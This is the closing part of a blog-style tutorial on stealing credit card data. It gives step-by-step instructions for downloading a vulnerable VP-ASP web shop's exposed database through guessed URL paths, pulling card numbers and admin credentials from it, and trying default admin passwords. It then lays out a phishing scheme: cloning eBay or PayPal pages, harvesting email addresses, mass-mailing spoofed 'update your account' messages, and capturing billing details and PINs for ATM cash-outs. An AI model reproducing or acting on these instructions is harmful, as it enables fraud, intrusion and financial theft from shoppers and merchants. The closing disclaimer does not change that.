Example:
The most important thing here is xDatabase
xDatabase: shopping140
Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb
If you didn’t download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb
Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.
The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp
If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
2. Hacking Through Scams
This method is usually used to hack for earning money. What happens in this method is you create a clone page.
Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.
What is eBay.com?
Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don’t have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.
How to get the emails of their users?
Go to google.com and type “Email Harvestor” or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.
Well u create a clone page of ebay, and mail the list u create from spider with message, like “Your account has been hacked” or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..
Now if u run ebay scam or paypal scam, its up to your luck who’s your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don’t its just luck, nothing else.
Search on google to download a scam site and study it !
After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore – Email Marketing Internet Advertising) and create a good email list.
And you need to find a mailer (mass sending mailer) which send mass – emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use : eBay – Update Your eBay Account and in Name use eBay
Some Instructions:
1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don’t find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.
That’s all folks. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial.
Do you have questions, comments, or suggestions? Feel free to post a comment!